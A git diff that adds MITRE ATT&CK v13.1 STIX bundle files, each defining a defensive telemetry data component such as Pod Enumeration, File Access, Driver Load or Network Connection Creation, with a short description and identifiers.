@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--80169b02-7ae4-4f7a-bfe0-65400d8b27d2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Pod Enumeration", + "description": "An extracted list of pods within a cluster (ex: kubectl get pods)", + "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e.json new file mode 100644 index 0000000000000000000000000000000000000000..1d03a716bf04d58a7170c128d051572a971e4316 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--5cdca9f6-49dd-40f8-bc0e-b4be19622b18", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Response Content", + "description": "Logged network traffic in response to a scan showing both protocol header and body values", + "x_mitre_data_source_ref": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd.json new file mode 100644 index 0000000000000000000000000000000000000000..7bbcd69f9b489efd7d2e6084ebec9abe9e4a96a6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ef0414d2-6fca-4ff0-93fd-fb8bc0bfddb2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Volume Metadata", + "description": "Contextual data about a cloud volume and activity around it, such as id, type, state, and size", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da.json new file mode 100644 index 0000000000000000000000000000000000000000..d1abd534db55340c70ebab3e64dac7ce4503b70c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--19f6f090-62a0-486d-bae4-f33bd97a69e9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Response Metadata", + "description": "Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports", + "x_mitre_data_source_ref": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json new file mode 100644 index 0000000000000000000000000000000000000000..c527d0b9a4796174c35071fd485bf7fabaf4462c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--50cf176a-ca2d-45e0-8707-aefd481e92d0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Deletion", + "description": "Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f.json new file mode 100644 index 0000000000000000000000000000000000000000..073dbedc9a2d2a7d7d4371960153aa7b8eddcd30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2ebf375d-060b-4132-a64f-c868864e17bd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Stop", + "description": "Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3.json new file mode 100644 index 0000000000000000000000000000000000000000..284cf9e885b66e2eae68d9ef1c2fa5f509a34d8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--faa5a986-c251-4a93-bad6-10779760d528", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:19:58.845Z", + "name": "Malware Content", + "description": "Code, strings, and other signatures that compromise a malicious payload", + "x_mitre_data_source_ref": "x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d.json new file mode 100644 index 0000000000000000000000000000000000000000..1656521a66aa9d0ec6c8f7479ab050ac9d416fa3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--550c2fa4-a755-4d05-a00d-862c03b7dbb1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Snapshot Deletion", + "description": "Removal of a snapshot (ex: AWS delete-snapshot)", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json new file mode 100644 index 0000000000000000000000000000000000000000..1ead46c0da56acebd35ea62310e941f0de83c2de --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--51b46536-0307-42f1-a4b8-45c948bbf56d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6.json new file mode 100644 index 0000000000000000000000000000000000000000..43b72658ad4e3da53239dcbe8d7c5da25a10225b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--fe130f25-37b8-4d57-9ba1-f303cf282ee2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Access", + "description": "Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a.json new file mode 100644 index 0000000000000000000000000000000000000000..049203be3336da02690ef978e7cee0abe67f6478 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--b8ee3c88-70a6-42c3-b3f6-e63691101fa4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Active Directory Object Creation", + "description": "Initial construction of a new active directory object (ex: Windows EID 5137)", + "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6.json new file mode 100644 index 0000000000000000000000000000000000000000..67a9e2ed0c39906c883889fbf0e27a218f3905a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--46866fe2-8c24-4e6f-98b6-6bb452767bbf", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Certificate Registration", + "description": "Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency)", + "x_mitre_data_source_ref": "x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json new file mode 100644 index 0000000000000000000000000000000000000000..808159ab8c0d71c258ee2919b8bddbe7badb0006 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--5cf7b3f2-799d-485c-8716-b96fcdd2f9d2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Access", + "description": "Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c.json new file mode 100644 index 0000000000000000000000000000000000000000..9260344c6ba7b7b6678999d1d866c866e990d98c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--c1719fb5-33ef-4c62-84ac-e10b20b2f7d8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Kernel Module Load", + "description": "An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls", + "x_mitre_data_source_ref": "x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5.json new file mode 100644 index 0000000000000000000000000000000000000000..fa0c1acd8f0cbe75de261a096b011cf1b7e4c7d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--1bff6f5f-91a7-4252-a4f3-4e9b42107f26", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Enumeration", + "description": "An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json new file mode 100644 index 0000000000000000000000000000000000000000..cbc55e52a727a4896e4e1515254472d03f708f09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--cbe79435-e5c5-4fcf-a01d-7d260941f850", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Creation", + "description": "Initial construction of a new file (ex: Sysmon EID 11)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811.json new file mode 100644 index 0000000000000000000000000000000000000000..727c9a774863c8916fc74cef0ab541ba824473e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--60def6ca-45df-4392-8bf2-08790094eb44", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811", + "created": "2021-10-20T15:05:19.275Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)", + "modified": "2022-05-02T23:19:55.148Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Active DNS", + "x_mitre_data_source_ref": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03.json new file mode 100644 index 0000000000000000000000000000000000000000..0b849a763c9611c30f07650e37b6f070eb538c17 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--6cfda767-1b0f-45bb-a9ff-cb6965bfef7a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Driver Load", + "description": "Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)", + "x_mitre_data_source_ref": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json new file mode 100644 index 0000000000000000000000000000000000000000..96d62414126fc4726e9ebdf1ece5d011dc348338 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--0fcea666-08ed-4c83-b5c8-6a88f43b5c5e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json new file mode 100644 index 0000000000000000000000000000000000000000..2e6d826db41fe99c238c8237a3e587eda68e283f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json 
